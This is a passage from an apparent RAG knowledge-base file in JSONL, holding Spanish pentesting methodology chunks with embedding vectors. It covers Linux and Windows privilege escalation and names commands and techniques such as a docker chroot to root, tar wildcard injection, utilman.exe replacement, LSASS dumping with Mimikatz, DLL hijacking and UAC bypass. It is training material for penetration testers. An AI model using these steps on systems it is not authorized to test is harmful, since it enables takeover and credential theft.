0.00629, -0.00162, -0.04727, 0.00373, 0.04824, -0.07156, 0.02882, -0.0163, -0.10124, 0.08131, -0.00095, -0.03359, 0.02688, -0.06256, 0.04548, 0.03699, 0.01518, 0.01825, 0.01726, -0.0195, -0.07168, 0.00526, -0.02172, -0.00525, -0.01243, 0.00699, 0.02544, 0.11584, -0.04486, 0.05679, 0.00755, 0.0471, -0.06258, 0.04936, 0.015, -0.03625, 0.05579, -0.01131, -0.07921, 0.04285, -0.00943, -0.00386, -0.04786, -0.01118, -0.03108, 0.01964, 0.05005, 0.01577, -0.05557, -0.02148, -0.01339, -0.04346, 0.00797, 0.02984, 0.01483, -0.03047, -0.03001, 0.00661, -0.0216, -0.01248, -0.05955]} +{"tipo": "metodologia", "herramienta": "Privesc Linux", "perfil": "PENTESTERS", "tema": "privesc", "fichero": "conocimiento/04 - Privesc/Privesc Linux.md", "texto": "# Privesc Linux\n\n> Tras el foothold (Reverse shell + Estabilizar shell TTY): script automatizado (PEASS-ng) **+** revisión manual. Paso 4 de la Metodología OSCP.", "v": [-0.10208, -0.16916, -0.18469, -0.21798, -0.00282, -0.16158, -0.06288, -0.10542, -0.02009, 0.13543, -0.06512, 0.06892, 0.05881, -0.03601, 0.16135, -0.02671, -0.055, -0.12949, 0.00992, 0.0307, -0.08555, -0.02541, -0.24211, -0.04612, 0.18415, 0.16945, 0.0099, -0.08308, -0.10383, -0.02069, -0.02534, 0.0682, -0.0525, -0.02509, -0.10365, 0.01761, 0.0591, -0.01292, 0.03478, 0.20804, 0.00447, 0.02533, 0.01699, 0.15125, 0.09572, -0.1482, 0.08218, 0.07184, 0.02674, 0.04079, 0.0142, -0.01337, -0.14424, 0.01092, 0.00533, 0.00473, 0.1836, 0.01172, 0.03486, -0.04697, -0.06796, 0.03505, -0.00299, 0.00815, 0.11021, -0.03721, 0.02842, -0.08964, -0.14944, 0.02979, 0.05426, 0.09781, -0.10608, 0.01599, 0.013, -0.00029, -0.04093, 0.04828, 0.09587, 0.0391, -0.03636, -0.05871, -0.0027, 0.05666, -0.05045, -0.10609, -0.04108, -0.05961, -0.06158, 0.03469, 0.06982, -0.0355, -0.03614, 0.02014, 0.05843, -0.04337, 0.01747, 0.05385, -0.022, -0.00347, 0.00788, 0.0049, 0.00991, 0.11925, 0.02884, -0.02679, 0.0348, 0.00506, 0.07388, 0.04612, 0.05037, 0.02496, -0.00318, 0.06321, -0.04498, -0.00435, -0.05915, 0.01801, 0.01638, -0.05305, 0.02037, 0.00051, -0.04296, -0.02924, -0.05306, -0.00825, 0.00862, 0.14636, -0.00397, -0.05304, -0.00336, -0.01775, -0.02512, 0.00292, -0.05076, 0.07532, 0.01404, 0.00259, -0.03104, -0.0284, 0.00121, 0.06667, 0.00082, 0.06364, 0.13845, -0.05146, 0.02314, -0.01209, 0.01925, 0.02749, 0.02991, 0.06842, 0.01997, -0.00418, -0.00316, -0.06938, 0.02752, 0.03497, -0.07071, 0.04966, 0.0532, -0.00028, 0.00439, -0.00901, -0.0178, 0.01969, 0.03202, 0.0313, -0.04217, -0.00677, 0.0286, 0.0202, 0.00047, -0.01564, -0.00484, -0.10095, 0.0234, -0.03336, -0.06117, 0.02706, 0.02839, -0.00491, -0.00513, -0.02192, 0.0192, 0.04029, -0.0116, 0.02884, 0.01074, -0.00182, 0.07848, 0.03592, -0.04211, -0.01892, -0.02069, 0.06384, -0.01448, -0.11836, -0.01204, -0.00572, -0.07888, 0.03921, -0.00655, -0.0482, -0.01495, 0.00037, -0.02246, 0.00959, -0.03081, -0.00838, -0.01084, -0.03525, 0.07135, 0.0279, 0.01613, 0.00775, 0.00573, 0.03703, -0.02862, 0.01295, 0.00059, -0.0071, 0.09003, -0.00894, -0.02615, -0.06768, 0.05909, 0.01032, 0.0129, -0.04257, -0.00807, 0.01933, 0.02378, -0.03967, -0.02509, 0.02197, 0.01584, -0.00895, 0.01158, -0.04366, 0.04855, 0.0388, -0.02911, -0.04309, -0.07049, -0.06701, -0.00138, 0.03648, 0.01833, 0.02405, -0.02999, -0.04459, -0.05487, -0.08705, -0.0388, -0.01504]} +{"tipo": "metodologia", "herramienta": "Privesc Linux", "perfil": "PENTESTERS", "tema": "privesc", "fichero": "conocimiento/04 - Privesc/Privesc Linux.md", "texto": "## Los 10 olvidados\n```\n1. sudo -l → SIEMPRE primero, sin password\n2. SUID exóticos → find / -perm -4000 2>/dev/null → GTFOBins y LOLBAS\n3. Capabilities → getcap -r / 2>/dev/null (cap_setuid en python/perl = root)\n4. Cron escribibles → /etc/crontab, /var/spool/cron (scripts que puedes editar)\n5. Wildcard injection → tar czf /backup/* con --checkpoint\n6. PATH abuse → script SUID llama \"ps\" sin ruta → creas ./ps malicioso\n7. NFS no_root_squash → showmount -e ; montas y subes un SUID\n8. Docker group → docker run -v /:/mnt -it alpine chroot /mnt (= root)\n9. Kernel exploits → último recurso: DirtyCow, DirtyPipe (uname -a; searchsploit)\n10. Ficheros sensibles → /etc/passwd escribible, /etc/shadow legible, /var/backups\n```", "v": [-0.07108, -0.29102, -0.23403, -0.06169, -0.03103, -0.22053, -0.03192, -0.0335, -0.01657, 0.08404, -0.15634, -0.10596, 0.05753, -0.18897, -0.05667, -0.11403, -0.11324, -0.08579, -0.00923, 0.07996, -0.07219, 0.00983, -0.01963, -0.07238, 0.02619, 0.18804, 0.04226, 0.09951, -0.13276, 0.00411, 0.02248, 0.01401, 0.00673, -0.02029, -0.06332, -0.05284, 0.06385, 0.04044, 0.00011, 0.25033, -0.06916, 0.0389, -0.12527, 0.16732, 0.04127, -0.15718, -0.01165, 0.05473, 0.02795, -0.01963, 0.01554, -0.07956, -0.11434, -0.09643, -0.00197, -0.02378, 0.13145, -0.12416, -0.0564, 0.05823, -0.05018, 0.06992, -0.04592, -0.04872, 0.0857, -0.0853, -0.01392, -0.07571, -0.08561, 0.11386, -0.07443, 0.03196, -0.00176, -0.05009, 0.06849, -0.04776, 0.05223, -0.04488, 0.08887, 0.09473, -0.04347, -0.03424, -0.03625, 0.01597, -0.09094, -0.07981, 0.00775, -0.01362, -0.03363, -0.01724, 0.06978, -0.00672, 0.02156, -0.0067, 0.02535, -0.077, 0.03211, 0.02905, -0.0119, -0.01668, -0.06438, 0.02956, 0.0043, 0.09859, 0.03313, -0.01255, 0.05663, 0.03989, 0.01674, 0.008, 0.07383, 0.05691, 0.01484, 0.00057, -0.02963, 0.01662, -0.08103, -0.00591, 0.08552, -0.01241, 0.03504, -0.00049, -0.0223, -0.03443, 0.00868, -0.04036, -0.00808, 0.06883, 0.04607, 0.06169, -0.00326, 0.05299, 0.0006, -0.02954, -0.05696, 0.08036, 0.03996, 0.03964, -0.00994, -0.06372, 0.01372, -0.01431, 0.0271, 0.04537, 0.0821, -0.01896, 0.03107, -0.08915, -0.02534, 0.06373, -0.01045, 0.01072, -0.00777, 0.0088, -0.0655, -0.00878, 0.02669, -0.04172, -0.07098, 0.02459, -0.00803, 0.00416, 0.00524, 0.02953, -0.03216, -0.04051, 0.05989, -0.03266, 0.00957, -0.00749, -0.01234, 0.01559, -0.02777, -0.05187, 0.00303, -0.09183, 0.08313, -0.0573, -0.00521, -0.0471, 0.08516, -0.08668, 0.03614, 0.04618, -0.01083, -0.07394, 0.04522, 0.00754, 0.02396, -0.01643, 0.0103, 0.01038, 0.04647, -0.01222, 0.0324, 0.00533, -0.0022, -0.02154, -0.01618, 0.02158, -0.03065, 0.0222, -0.04156, 0.02152, 0.00487, 0.00262, 0.00481, -0.00374, -0.07005, -0.00395, 0.00623, -0.00438, -0.00388, 0.00276, -0.077, -0.03192, -0.02271, 0.08115, -0.00476, -0.00434, -0.0192, 0.0781, 0.05288, 0.03493, -0.02054, -0.01786, -0.00654, -0.03854, 0.01331, 0.02106, -0.04324, 0.06054, 0.02031, -0.01876, 0.01908, -0.03685, -0.01019, -0.03013, 1e-05, -0.01163, -0.0046, 0.02183, 0.02049, -0.05008, -0.07596, -0.01918, -0.02343, 0.03112, -0.00172, 0.00803, -0.01461, -0.00528, -0.0317, -0.0789, -0.01564, 0.01748]} +{"tipo": "metodologia", "herramienta": "Privesc Linux", "perfil": "PENTESTERS", "tema": "privesc", "fichero": "conocimiento/04 - Privesc/Privesc Linux.md", "texto": "## Orden recomendado\n`sudo -l` → SUID/caps + GTFOBins y LOLBAS → cron → resto. **Kernel exploit = último recurso** (inestable) → Exploits conocidos.", "v": [-0.16079, -0.11472, -0.22975, -0.00562, 0.01695, -0.27569, -0.01701, 0.03999, -0.06471, 0.03751, -0.15789, -0.14127, 0.01214, 0.0385, 0.05571, -0.00242, -0.00407, -0.0717, -0.04608, -0.0096, -0.08998, -0.01233, 0.03006, 0.03967, 0.07766, 0.0375, -0.05826, -0.07194, 0.00606, -0.07543, 0.02917, -0.04302, -0.06682, -0.04127, -0.15582, 0.07822, 0.05646, 0.13325, -0.02477, 0.23355, 0.00664, -0.00317, -0.17577, 0.10227, 0.05778, -0.08196, -0.03445, 0.14593, -0.02813, -0.03148, 0.06069, -0.07149, -0.06331, -0.10014, 0.00395, -0.08839, 0.00059, -0.08289, -0.14016, 0.10271, -0.00282, -0.05566, -0.03136, -0.03725, 0.04222, -0.0641, -0.0835, 0.11422, -0.05429, 0.03837, -0.14366, 0.11741, -0.04092, 0.00597, 0.04749, -0.05518, 0.10151, -0.00216, 0.17033, 0.08303, -0.04874, -0.04969, -0.00259, 0.03006, -0.12924, -0.05554, 0.10691, -0.07748, -0.05408, -0.05486, 0.04084, -0.06725, -0.00134, 0.04771, 0.04043, -0.03719, 0.08893, 0.00054, 0.00978, -0.00353, -0.07604, 0.05208, 0.00533, 0.05188, 0.04579, 0.04217, 0.00078, 0.02294, 0.05583, -0.01038, 0.01742, 0.04264, 0.00814, 0.04364, 0.0364, 0.00168, -0.1284, -0.04202, 0.02074, -0.01877, 0.00928, -0.06742, 0.01323, -0.02454, 0.04125, -0.04053, -0.02841, 0.06145, 0.07072, 0.01221, -0.02065, 0.05505, 0.10281, 0.02188, -0.05023, 0.03019, 0.01974, 0.03272, -0.01858, -0.04017, 0.04447, 0.02481, 0.03558, 0.00703, 0.08286, 0.03364, 0.14547, -0.07961, -0.00596, 0.03629, -0.00924, 0.0359, 0.00369, -0.00088, -0.00552, 0.01974, -0.02329, -0.01459, -0.03404, 0.02124, 0.00384, 0.06079, -0.03498, 0.10927, -0.04315, 0.00496, 0.03176, -0.00469, 0.02507, -0.0342, -0.06106, 0.02077, -0.06581, 0.02107, 0.09918, -0.03282, 0.05293, -0.00817, 0.00812, -0.03577, -0.00017, -0.08302, -0.04703, 0.008, -0.0328, -0.08974, 0.04228, -0.00245, 6e-05, 0.01726, 0.00429, 0.03712, 0.04413, 0.01784, 0.03633, 0.02606, -0.0265, -0.02323, 0.02772, 0.01436, -0.04972, -0.0287, -0.04412, 0.0327, 0.01819, -0.03155, -0.03143, 0.05519, -0.06496, 0.05111, -0.00874, -0.06318, 0.00919, -0.01516, -0.01698, 0.00724, 0.03519, 0.01024, 0.00033, 0.02921, -0.00052, 0.11162, 0.06726, -0.0162, -0.02724, 0.01057, -0.03711, -0.03281, 0.0357, 0.00175, -0.0139, 0.05317, -0.01489, -0.07211, 0.03193, 0.00528, -0.02738, 0.00918, -0.00625, -0.00958, -0.04173, 0.03814, 0.01105, -0.01461, -0.07915, 0.01467, -0.06368, 0.0464, 0.00294, 0.01233, 0.02185, 0.03728, -0.01107, -0.07732, -0.01033, 0.00876]} +{"tipo": "metodologia", "herramienta": "Privesc Linux", "perfil": "PENTESTERS", "tema": "privesc", "fichero": "conocimiento/04 - Privesc/Privesc Linux.md", "texto": "## Herramientas\n`linpeas.sh` (PEASS-ng), `LinEnum`, `linux-exploit-suggester` (LES), `lse.sh`, y `pspy` (espía cron/procesos sin root). Ver Herramientas (índice).\n\nRelacionado: Exploits conocidos · PEASS-ng · Privesc Windows · OSCP MOC", "v": [-0.14633, -0.2093, -0.08865, -0.08325, 0.05466, -0.27413, -0.02501, -0.22657, -0.11061, 0.02377, 0.0241, 0.07589, 0.03452, -0.17655, 0.097, -0.04847, -0.0845, 0.00854, 0.02806, -0.03429, -0.11851, 0.10371, -0.18276, 0.04084, 0.04338, 0.19472, 0.02696, -0.00771, -0.02259, -0.00516, -0.13215, 0.07706, -0.06358, 0.04199, -0.06629, -0.0322, 0.00259, 0.07102, 0.13634, 0.28001, 0.04592, 0.04435, -0.12508, 0.11305, 0.06636, -0.16611, -0.02369, 0.08646, 0.09117, -0.02409, -0.09533, 0.00673, -0.09513, -0.03874, 0.08974, 0.04518, 0.02773, 0.03646, -0.02314, 0.02873, -0.02224, 0.03419, -0.00415, -0.14604, 0.10308, -0.03526, 0.02687, -0.04886, -0.01663, 0.04265, -0.06248, 0.14214, -0.04308, 0.02477, 0.05196, -0.00238, -0.02894, -0.00468, 0.08522, 0.03326, 0.04996, -0.01834, 0.04364, -0.02279, -0.03042, -0.03569, 0.03183, 0.0007, -0.04426, 0.0021, 0.10354, 0.02884, -0.08249, 0.05577, 0.04859, -0.03187, -0.02287, 0.01566, 0.01799, 0.04877, 0.0011, 0.05886, -0.00393, 0.10133, 0.03534, 0.00493, -0.01895, 0.09121, -0.00011, -0.0321, 0.06753, 0.00828, -0.04707, -6e-05, -0.02492, -0.02246, -0.06924, -0.03124, -0.00312, -0.03083, -0.02187, -0.03478, 0.0215, -0.01741, -0.04472, -0.08896, -0.02915, 0.06096, 0.01873, -0.01995, -0.02646, -0.05606, 0.03913, -0.04319, -0.03068, -0.01703, 0.01421, -0.02615, 0.0852, -0.02453, 0.03614, 0.05212, 0.04233, 0.00189, 0.07232, 0.01616, 0.11437, -0.04386, 0.01996, 0.00655, -0.02377, -0.03756, -0.01262, 0.01434, 0.04689, -0.03029, -0.03741, 0.03958, 0.02344, 0.0372, 0.04891, 0.03377, 0.02186, 0.01469, -0.02147, 0.01547, 0.07105, 0.0008, -0.02191, -0.03856, 0.00653, 0.00817, -0.05021, -0.03311, -0.00263, -0.13617, 0.06887, -0.04503, -0.06759, 0.01807, -0.02832, -0.02403, 0.03447, 0.02885, -0.03584, -0.04933, -0.00514, 0.00123, -0.01012, -0.06728, 0.03306, -0.00504, 0.02578, -0.02288, -0.00405, 0.03995, -0.01409, -0.03297, 0.00399, -0.03518, 0.03298, 0.01763, -0.02677, 0.01171, 0.08182, -0.02379, -0.00657, 0.00385, -0.02349, -0.0128, 0.00582, -0.01927, 0.01585, 0.00029, -0.00632, -0.02113, 0.0069, 0.03757, -0.00768, -0.00292, -0.04404, 0.06613, 0.08388, 0.00293, -0.03481, -0.03184, -0.00333, -0.00328, 0.03322, -0.05418, -0.07155, 0.04067, 0.02586, -0.01871, 0.04786, 0.01872, -0.01735, -0.02606, -0.0167, -0.03768, -0.00771, 0.02909, 0.03483, -0.03617, -0.0738, -0.05074, -0.00528, 0.00897, 0.00942, -0.01752, 0.02407, -0.03124, -0.01171, -0.11023, -0.01483, 0.02223]} +{"tipo": "metodologia", "herramienta": "Privesc Windows", "perfil": "PENTESTERS", "tema": "privesc", "fichero": "conocimiento/04 - Privesc/Privesc Windows.md", "texto": "# Privesc Windows\n\n> Tras la Reverse shell PowerShell: PEASS-ng (winPEAS) **+** revisión manual. Camino a SYSTEM.", "v": [-0.18817, -0.26109, -0.12657, -0.1963, 0.07115, -0.08545, -0.03461, -0.21126, 0.0134, -0.02064, -0.08842, 0.09318, -0.06878, -0.1269, 0.13251, 0.12531, -0.13158, 0.01606, 0.04775, 0.10942, -0.00807, -0.03266, -0.25275, -0.01544, 0.13316, 0.23789, -0.00955, -0.02231, -0.1215, -0.04257, 0.04001, 0.03053, -0.019, -0.10331, -0.0443, -0.04845, -0.0323, 0.0887, 0.1312, 0.17897, 0.01843, 0.10253, -0.07008, 0.12078, 0.07051, -0.1169, 0.06693, -0.02272, 0.06028, -0.02348, -0.15589, 0.01163, -0.1375, -0.06035, 0.0782, -0.06779, 0.12055, 0.03944, -0.10207, -0.07643, 0.00078, 0.04804, 0.03962, -0.01117, 0.03562, -0.02479, 0.05401, -0.10952, -0.00871, 0.09473, -0.0844, 0.02786, 0.09481, -0.0219, -0.03848, -0.03785, -0.03202, 0.03892, 0.08984, 0.00491, 0.00135, -0.00718, -0.06518, 0.00059, 0.03478, -0.02294, -0.07165, -0.03644, -0.00697, -0.0342, 0.07161, -0.0979, -0.04196, 0.11161, 0.05205, -0.02814, -0.0775, 0.00288, -0.03111, 0.06582, -0.00691, -0.07045, 0.0503, 0.04743, 0.01592, 0.01213, -0.03694, 0.02033, 0.04511, 0.02507, 0.00313, 0.03885, -0.03754, 0.02807, 0.02163, 0.01065, -0.01482, -0.01336, -0.0442, -0.03835, 0.02226, 0.00068, -0.00291, -0.00402, 0.00871, -0.01886, 0.03794, 0.09685, 0.02206, -0.00677, 0.04539, -0.04167, 0.01031, -0.00975, 0.01063, 0.03743, -0.03362, 0.04939, 0.0006, -0.02307, 0.03093, 0.06177, 0.01294, 0.00621, 0.04515, -0.06944, 0.04936, 0.01322, 0.03612, 0.02314, 0.00588, 0.02702, 0.00706, 0.01789, 0.02824, 0.01253, 0.02526, 0.06539, -0.03753, -0.00308, 0.01942, 0.0014, 0.00927, -0.03148, -0.0024, -0.0043, 0.00228, 0.00278, 0.00365, -0.04626, -0.03341, 0.01824, -0.06519, 0.02914, -0.01245, -0.03036, 0.07556, -0.00036, -0.07181, -0.00751, -0.05602, -0.00506, 0.02467, -0.00522, 0.00191, 0.03457, -0.05058, -0.0096, -0.00906, -0.04119, 0.00366, 0.02924, 0.01453, -0.03119, 0.04456, 0.02027, -0.03407, -0.09768, -0.01642, 0.00015, -0.07362, 0.0432, -0.06537, -0.04395, 0.02386, 0.03662, -0.01311, -0.01149, 0.00988, -0.00528, 0.02787, -0.02743, 0.04618, -0.01094, -0.03362, -0.03254, 0.01435, 0.00233, -0.01887, 0.02178, -0.01515, 0.02301, 0.07188, 0.02341, 0.01845, -0.03689, 0.02498, -0.00286, -0.03214, -0.02924, -0.00142, 0.00977, 0.01329, -0.03069, 0.00209, 0.02571, 0.02298, -0.00303, 0.00581, -0.02189, 0.02335, 0.05234, 0.01721, -0.02877, -0.05859, -0.02507, 0.0033, -0.00249, -0.00199, -0.0017, 0.01069, -0.04772, -0.05871, -0.11565, -0.02758, -0.00899]} +{"tipo": "metodologia", "herramienta": "Privesc Windows", "perfil": "PENTESTERS", "tema": "privesc", "fichero": "conocimiento/04 - Privesc/Privesc Windows.md", "texto": "## Los 10 olvidados\n```\n1. whoami /priv → SeImpersonate/SeAssignPrimaryToken → Potato attacks\n2. Unquoted services → wmic service get name,pathname,startmode\n path con espacios sin comillas + carpeta escribible = exe propio\n3. AlwaysInstallElev. → reg query HKLM\\...\\Windows\\Installer (ambos =1 → msi = SYSTEM)\n4. Service permisos → accesschk.exe -uwcqv user * (SERVICE_CHANGE_CONFIG)\n5. Creds en disco → Unattend.xml, sysprep.inf, web.config, cmdkey /list, SAM/SYSTEM\n6. AutoLogon registro → HKLM\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Winlogon\n7. Pass spraying → la pass del user normal contra admin/administrator/sa\n8. WSL / OpenSSH → credenciales en .bash_history\n9. Scheduled tasks → schtasks /query /fo LIST /v (scripts editables)\n10. UAC bypass + token impersonation\n```", "v": [-0.08368, -0.06418, -0.12289, -0.19998, 0.03769, -0.26813, -0.15855, -0.10555, -0.06465, 0.06235, -0.16994, -0.122, -0.00522, -0.09044, 0.01882, 0.06031, 0.04857, -0.12772, -0.02233, 0.04644, -0.00256, 0.06975, -0.05036, 0.03225, 0.05723, 0.11513, -0.02629, -0.049, -0.17304, -0.02548, 0.02516, 0.02644, -0.03515, -0.02326, 0.05653, -0.05272, -0.0231, 0.09161, 0.04411, 0.21812, 0.07922, 0.05436, -0.07875, 0.15827, 0.08798, -0.11139, 0.09296, 0.0205, 0.11043, -0.09151, -0.05014, -0.08516, -0.13434, -0.0755, 0.0838, -0.03631, 0.10983, -0.09948, -0.09409, 0.03654, -0.03139, 0.09246, -0.00183, 0.0105, 0.0514, 0.03983, 0.11125, -0.09206, -0.02637, 0.15757, -0.11441, -0.01703, 0.06494, -0.05758, 0.06826, -0.03582, -0.00394, -0.07866, 0.08731, 0.07422, -0.03933, -0.04531, -0.05239, -0.10317, -0.01969, -0.0713, 9e-05, -0.01805, 0.014, -0.03151, 0.14758, -0.06654, -0.03817, 0.06922, 0.0721, -0.05743, -0.02017, -0.01551, 0.01823, 0.01538, 0.00514, -0.03202, -0.031, 0.12986, -0.01771, 0.05582, 0.04325, -0.07125, -0.01208, -0.01453, 0.0787, -0.00497, 0.0182, 0.00364, -0.01045, -0.02104, -0.03256, 0.00018, -0.03011, -0.01544, 0.00952, -0.05039, -0.02077, 0.00234, 0.02617, -0.0655, -0.01061, 0.11234, -0.09028, 0.0447, 0.04613, 0.00081, -0.07202, -0.04725, -0.00878, 0.06111, 0.01951, 0.05339, 0.01887, -0.00864, 0.11256, 0.11017, 0.05569, 0.0628, 0.07793, 0.03428, 0.06836, -0.02132, -0.03339, 0.01387, 0.02018, 0.04158, 0.02147, 0.04244, -0.04784, -0.01302, 0.01454, -0.006, -0.03006, -0.01787, 0.02436, 0.05681, 0.04298, 0.02948, -0.02325, -0.01829, 0.02549, -0.00583, 0.04144, -0.02726, -0.00357, 0.06257, -0.06807, -0.07414, -0.03216, -0.05547, 0.03766, -0.0611, 0.00804, -0.01793, -0.03934, -0.0697, 0.0514, 0.02595, -0.03332, -0.03068, 0.01531, -0.01479, -0.02822, -0.00705, -0.00882, 0.04121, 0.01681, -0.01399, 0.00923, 0.00032, -0.02722, -0.02573, -0.0188, -0.01569, -0.06371, 0.02859, -0.04344, -0.01276, 0.05048, 0.00872, 0.03208, 0.07288, -0.0451, 0.04824, 0.01512, -0.01335, 0.01476, -0.04318, -0.04747, -0.06827, 0.04656, -0.00138, 0.00942, -0.02005, 0.0067, 0.05094, 0.04521, -0.03235, 0.0008, -0.00625, 0.0134, -0.0386, 0.0502, 0.0138, -0.03312, 0.01938, 0.01771, -0.04165, 0.03671, 0.00544, 0.00418, -0.05461, -0.04099, -0.02662, 0.02797, 0.04869, 0.01813, -0.09883, -0.08324, -0.03753, -0.01889, 0.00922, 0.03037, -0.02132, -0.0115, 0.02965, -0.00729, -0.07402, 0.02564, 0.00474]} +{"tipo": "metodologia", "herramienta": "Privesc Windows", "perfil": "PENTESTERS", "tema": "privesc", "fichero": "conocimiento/04 - Privesc/Privesc Windows.md", "texto": "## Privilegios de token (SeXxxPrivilege)\n```\nSeImpersonate / SeAssignPrimaryToken → Potato attacks\nSeBackupPrivilege → lees ficheros restringidos (copias SAM/SYSTEM, NTDS.dit)\nSeRestorePrivilege → escribes donde quieras: sustituye utilman.exe por cmd.exe\nSeDebugPrivilege → vuelcas LSASS → Mimikatz\nSeTakeOwnership → te apropias de objetos protegidos\n```", "v": [-0.34577, -0.12517, -0.13542, -0.06978, 0.14638, -0.23986, -0.05369, -0.13363, -0.0658, 0.05086, -0.10295, -0.05222, 0.0106, -0.14869, 0.16217, 0.04588, 0.08698, -0.09953, 0.08831, 0.04742, 0.0654, 0.02376, -0.07668, 0.05848, 0.14772, 0.0845, 0.09602, 0.00293, -0.08295, -0.02116, -0.00254, 0.09618, 0.02023, -0.12576, 0.05363, -0.08802, -0.03236, -0.02862, 0.04299, 0.14908, 0.22028, 0.03555, -0.14407, 0.01738, 0.0358, -0.12078, 0.04874, 0.03225, 0.03502, -0.12487, -0.04981, -0.043, -0.06442, -0.05528, 0.04761, -0.02407, 0.10465, 0.01907, -0.0501, 0.10017, -0.05529, 0.0456, 0.10418, -0.05732, 0.05208, -0.02158, 0.07319, -0.01546, -0.03441, 0.0762, -0.08226, -0.00103, -0.03225, -0.12279, -0.01611, 0.03422, -0.01055, -0.08194, 0.12452, 0.01128, -0.01368, -0.01354, -0.06838, -0.027, 0.03472, 0.04442, -0.01355, 0.00709, -0.08841, -0.00962, 0.15776, 0.04558, 0.05411, 0.05404, 0.03041, -0.0266, -0.06671, 0.06839, 0.03731, 0.06242, 0.07284, -0.01456, -0.02177, 0.06878, -0.01091, 0.03031, -0.04719, -0.02665, -0.03409, -0.03169, 0.06576, -0.0252, 0.00711, -0.00472, -0.06618, -0.01921, -0.03975, 0.02486, 0.02891, 0.06638, 0.00901, -0.06586, -0.04049, 0.01219, 0.03226, -0.04105, -0.03542, 0.04127, -0.05752, 0.00204, 0.02599, 0.02632, 0.04242, 0.02054, 0.02486, 0.02608, -0.06235, -0.01654, -0.00356, -0.07115, 0.06192, 0.00886, 0.01179, 0.07071, 0.00738, 0.03677, 0.01211, -0.01386, 0.01761, 0.03521, 0.03354, -0.02916, 0.07863, 0.03371, 0.05858, 0.03276, -0.04096, -0.04983, -0.02917, -0.01579, 0.03168, 0.0272, 0.01562, 0.01196, 0.00361, -0.0075, 0.04486, -0.0769, 0.02465, -0.04983, 0.0026, 0.01428, -0.02546, -0.06303, -0.01467, -0.1206, -0.02655, -0.00464, 0.01361, -0.05222, -0.05236, -0.03317, 0.03747, -0.02242, -0.01815, -0.02819, 0.0461, 0.05127, 0.00502, -0.02018, -0.04121, 0.04777, -0.0338, -0.01775, -0.00694, -0.02615, -0.05846, -0.02104, 0.01405, 0.00493, 0.00203, 0.0032, -0.07735, -0.07114, 0.00193, 0.01375, -0.03725, -0.0549, -0.07654, 0.01123, 0.01227, 0.00643, 0.0568, 0.00168, 0.01257, -0.02541, 0.03377, 0.01797, -0.06289, -0.00429, -0.01828, 0.01989, 0.06215, -0.04499, 0.04089, -0.00976, 0.02312, 0.00691, 0.04891, -0.00423, -0.01752, 0.00592, 0.03636, -0.048, 0.04862, 0.05809, -0.00884, -0.0151, -0.02254, 0.01138, 0.02024, 0.05459, 0.00243, -0.05961, 0.00046, -0.08559, -0.03096, -0.00017, 0.04962, -0.02875, 0.03063, 0.01772, 0.00446, -0.03991, 0.02225, 0.006]} +{"tipo": "metodologia", "herramienta": "Privesc Windows", "perfil": "PENTESTERS", "tema": "privesc", "fichero": "conocimiento/04 - Privesc/Privesc Windows.md", "texto": "## Otras técnicas (del sitio)\n- **DLL hijacking**: servicio que carga una DLL por ruta insegura → pones tu DLL (msfvenom `-f dll`) y reinicias el servicio.\n- **UAC bypass** vía `eventvwr.exe` (hijack de registro) cuando ya tienes código en un user del grupo Administrators.\n- **Unattend.xml / cmdkey / registro** → credenciales en disco (ya en los 10 olvidados).", "v": [-0.08048, -0.14635, -0.17227, -0.08298, 0.05945, -0.12618, -0.09375, 0.03829, 0.00123, 0.01195, -0.08942, -0.26227, -0.02775, -0.13172, 0.03284, -0.11031, 0.1362, -0.04036, 0.01675, -0.08924, -0.04849, 0.0271, -0.0574, 0.09267, -0.05289, 0.03361, -0.00721, -0.02975, -0.1561, -0.08742, 0.11727, -0.05058, -0.01222, -0.10812, 0.10004, -0.01869, 0.04418, 0.10837, 0.09136, 0.16392, -0.01748, 0.07748, -0.14914, 0.07471, 0.02519, -0.07379, 0.05077, 0.04823, 0.04711, -0.12415, 0.04836, -0.04136, -0.16361, -0.07558, 0.07445, -0.02109, 0.09729, -0.09707, -0.0296, 0.02417, -0.03829, 0.03895, -0.06, 0.04475, 0.07334, -0.06476, 0.12061, -0.08678, -0.03174, 0.09223, -0.00577, 0.00513, 0.08468, -0.14254, 0.04429, -0.06943, 0.07543, -0.02182, 0.10208, 0.09664, 0.01132, -0.02473, -0.02985, -0.04849, -0.07891, -0.02803, 0.06488, -0.02529, -0.0289, -0.06172, 0.20926, 0.02736, 0.01641, 0.04929, 0.03827, -0.03131, 0.06473, 0.03035, 0.01963, -0.05394, 0.03716, 0.06247, 0.01177, 0.11712, 0.05976, 0.05618, 0.0445, -0.02777, 0.07366, 0.03583, 0.06941, 0.00458, -0.01292, -0.03777, -0.04531, -0.01459, -0.01105, -0.03279, 0.00295, 0.00176, 0.0104, -0.03936, 0.02654, 0.00167, -0.00584, -0.01337, -0.04158, 0.09701, -0.0159, -0.04655, 0.00472, -0.06655, -0.04182, -0.03247, 0.02533, 0.05852, 0.02302, 0.06822, -0.03149, 0.02331, 0.0834, 0.06878, -0.00326, 0.03501, 0.04317, 0.03188, 0.03049, -0.10083, -0.08285, 0.01795, 0.05905, 0.111, 0.0019, 0.05091, -0.0083, 0.00707, 0.01712, -0.0154, -0.02689, 0.0569, -0.03625, 0.03302, 0.06978, 0.0138, -0.02198, 0.00585, 0.00693, -0.08168, 0.0204, -0.06189, -0.05017, 0.02769, 0.00161, -0.08469, -0.01079, -0.08016, -0.02048, -0.1448, 0.04975, -0.02303, -0.00295, -0.05376, 0.08047, 0.02483, -0.0212, -0.0839, 0.04298, -0.00295, -0.00545, -0.02973, 0.00033, 7e-05, 0.01916, -0.00233, 0.00065, 0.01854, 0.00271, -0.01286, -0.01557, -0.00847, -0.06901, -0.0192, -0.0044, -0.03935, -0.01741, -0.01227, -0.00343, 0.04799, -0.04307, 0.05253, 0.05318, -0.01408, 0.03209, -0.02588, -0.06947, -0.04863, -0.0282, 0.04273, 0.01453, 0.03546, -0.00051, 0.05952, 0.03414, 0.01433, 0.01033, -0.03247, 0.03273, -0.01298, 0.07451, 0.04954, 0.01109, 0.05612, -0.04837, -0.04408, 0.08693, 0.01952, 0.01228, -0.04575, -0.02129, -0.05763, 0.02364, 0.06714, -0.02551, -0.06666, -0.04538, -0.04741, -0.05856, 0.07386, -0.01622, -0.02654, 0.00022, -0.04455, 0.02227, -0.0376, 0.03494, -0.03148]} +{"tipo": "metodologia", "herramienta": "Privesc Windows", "perfil": "PENTESTERS", "tema": "privesc", "fichero": "conocimiento/04 - Privesc/Privesc Windows.md", "texto": "## Herramientas\n`PowerUp`, `PrivescCheck`, `Sherlock` (PowerShell) + 